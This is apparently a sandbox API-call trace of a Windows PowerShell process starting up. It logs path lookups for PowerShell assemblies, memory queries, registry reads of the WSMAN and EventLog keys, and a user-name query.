	[0191.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.757] VirtualQuery (in: lpAddress=0x12b720, lpBuffer=0x12c5e0, dwLength=0x30 | out: lpBuffer=0x12c5e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0191.758] VirtualQuery (in: lpAddress=0x12b7b0, lpBuffer=0x12c670, dwLength=0x30 | out: lpBuffer=0x12c670*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0191.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.759] VirtualQuery (in: lpAddress=0x12bf30, lpBuffer=0x12cdf0, dwLength=0x30 | out: lpBuffer=0x12cdf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0191.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.761] VirtualQuery (in: lpAddress=0x12bf30, lpBuffer=0x12cdf0, dwLength=0x30 | out: lpBuffer=0x12cdf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0191.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.926] CoTaskMemAlloc (cb=0x5a) returned 0x1b8b6510
	[0203.926] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8b6510, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0203.927] CoTaskMemFree (pv=0x1b8b6510) 
	[0203.929] CoTaskMemAlloc (cb=0x5a) returned 0x1b8b6510
	[0203.929] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8b6510, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0203.930] CoTaskMemFree (pv=0x1b8b6510) 
	[0204.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0204.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0204.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0204.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0205.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0205.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0205.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0205.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0205.937] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0205.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.938] CoTaskMemFree (pv=0x221730) 
	[0205.939] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0205.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.939] CoTaskMemFree (pv=0x221730) 
	[0205.940] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0205.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.940] CoTaskMemFree (pv=0x221730) 
	[0205.942] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0205.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0205.942] CoTaskMemFree (pv=0x221730) 
	[0206.608] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0206.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.608] CoTaskMemFree (pv=0x221730) 
	[0206.612] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0206.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.612] CoTaskMemFree (pv=0x221730) 
	[0206.613] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0206.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.613] CoTaskMemFree (pv=0x221730) 
	[0206.628] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6f8 | out: phkResult=0x12d6f8*=0x308) returned 0x0
	[0206.634] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d5fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d5f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0206.634] CoTaskMemFree (pv=0x0) 
	[0206.635] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0206.635] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x1640a0, lpcchValueName=0x12d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0206.636] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d68c, lpData=0x0, lpcbData=0x12d688*=0x0 | out: lpType=0x12d68c*=0x1, lpData=0x0, lpcbData=0x12d688*=0x8) returned 0x0
	[0206.637] CoTaskMemAlloc (cb=0xc) returned 0x1b8c1fb0
	[0206.637] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d65c, lpData=0x1b8c1fb0, lpcbData=0x12d658*=0x8 | out: lpType=0x12d65c*=0x1, lpData="2.0", lpcbData=0x12d658*=0x8) returned 0x0
	[0209.577] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d648 | out: phkResult=0x12d648*=0x160) returned 0x0
	[0209.577] RegQueryInfoKeyW (in: hKey=0x160, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d54c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d548*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.577] CoTaskMemFree (pv=0x0) 
	[0209.577] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0209.577] RegEnumValueW (in: hKey=0x160, dwIndex=0x0, lpValueName=0x1640a0, lpcchValueName=0x12d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0209.577] CoTaskMemFree (pv=0x1640a0) 
	[0209.577] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0209.577] RegEnumValueW (in: hKey=0x160, dwIndex=0x1, lpValueName=0x1640a0, lpcchValueName=0x12d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0209.577] CoTaskMemFree (pv=0x1640a0) 
	[0209.577] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0209.577] RegEnumValueW (in: hKey=0x160, dwIndex=0x2, lpValueName=0x1640a0, lpcchValueName=0x12d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0209.578] CoTaskMemFree (pv=0x1640a0) 
	[0209.578] RegQueryValueExW (in: hKey=0x160, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d5dc, lpData=0x0, lpcbData=0x12d5d8*=0x0 | out: lpType=0x12d5dc*=0x1, lpData=0x0, lpcbData=0x12d5d8*=0x8) returned 0x0
	[0209.578] CoTaskMemAlloc (cb=0xc) returned 0x1b8c1bb0
	[0209.578] RegQueryValueExW (in: hKey=0x160, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d5ac, lpData=0x1b8c1bb0, lpcbData=0x12d5a8*=0x8 | out: lpType=0x12d5ac*=0x1, lpData="2.0", lpcbData=0x12d5a8*=0x8) returned 0x0
	[0209.578] CoTaskMemFree (pv=0x1b8c1bb0) 
	[0209.579] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0209.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0209.579] CoTaskMemFree (pv=0x221730) 
	[0209.583] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0209.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0209.583] CoTaskMemFree (pv=0x221730) 
	[0209.588] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d678 | out: phkResult=0x12d678*=0x164) returned 0x0
	[0209.594] RegQueryInfoKeyW (in: hKey=0x164, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d5ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d5e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d5ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d5e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.594] CoTaskMemFree (pv=0x0) 
	[0209.595] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0209.595] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x0, lpName=0x1640a0, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.609] RegOpenKeyExW (in: hKey=0x164, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x334) returned 0x0
	[0209.609] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x0) returned 0x2
	[0209.609] RegOpenKeyExW (in: hKey=0x164, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x338) returned 0x0
	[0209.609] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x33c) returned 0x0
	[0209.609] RegCloseKey (hKey=0x33c) returned 0x0
	[0209.609] RegCloseKey (hKey=0x164) returned 0x0
	[0209.610] RegCloseKey (hKey=0x338) returned 0x0
	[0210.217] CoTaskMemAlloc (cb=0x804) returned 0x1b8db680
	[0210.218] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8db680, nSize=0x12d8e8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d8e8) returned 0x1
	[0210.219] CoTaskMemFree (pv=0x1b8db680) 
	[0210.220] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0210.220] GetUserNameW (in: lpBuffer=0x1640a0, pcbBuffer=0x12d928 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d928) returned 1
	[0210.220] CoTaskMemFree (pv=0x1640a0) 
	[0217.560] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d628 | out: phkResult=0x12d628*=0x340) returned 0x0
	[0217.560] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.560] CoTaskMemFree (pv=0x0) 
	[0217.560] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0217.561] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x1640a0, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.561] CoTaskMemFree (pv=0x1640a0) 
	[0217.561] CoTaskMemFree (pv=0x0) 
	[0217.561] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0217.561] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x1640a0, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.561] CoTaskMemFree (pv=0x1640a0) 
	[0217.561] CoTaskMemFree (pv=0x0) 
	[0217.561] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0217.561] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x1640a0, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.561] CoTaskMemFree (pv=0x1640a0) 
	[0217.561] CoTaskMemFree (pv=0x0) 
	[0217.561] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0217.561] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x1640a0, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.561] CoTaskMemFree (pv=0x1640a0) 
	[0217.561] CoTaskMemFree (pv=0x0) 
	[0217.561] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0217.561] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x1640a0, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.561] CoTaskMemFree (pv=0x1640a0) 
	[0217.561] CoTaskMemFree (pv=0x0) 
	[0217.561] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
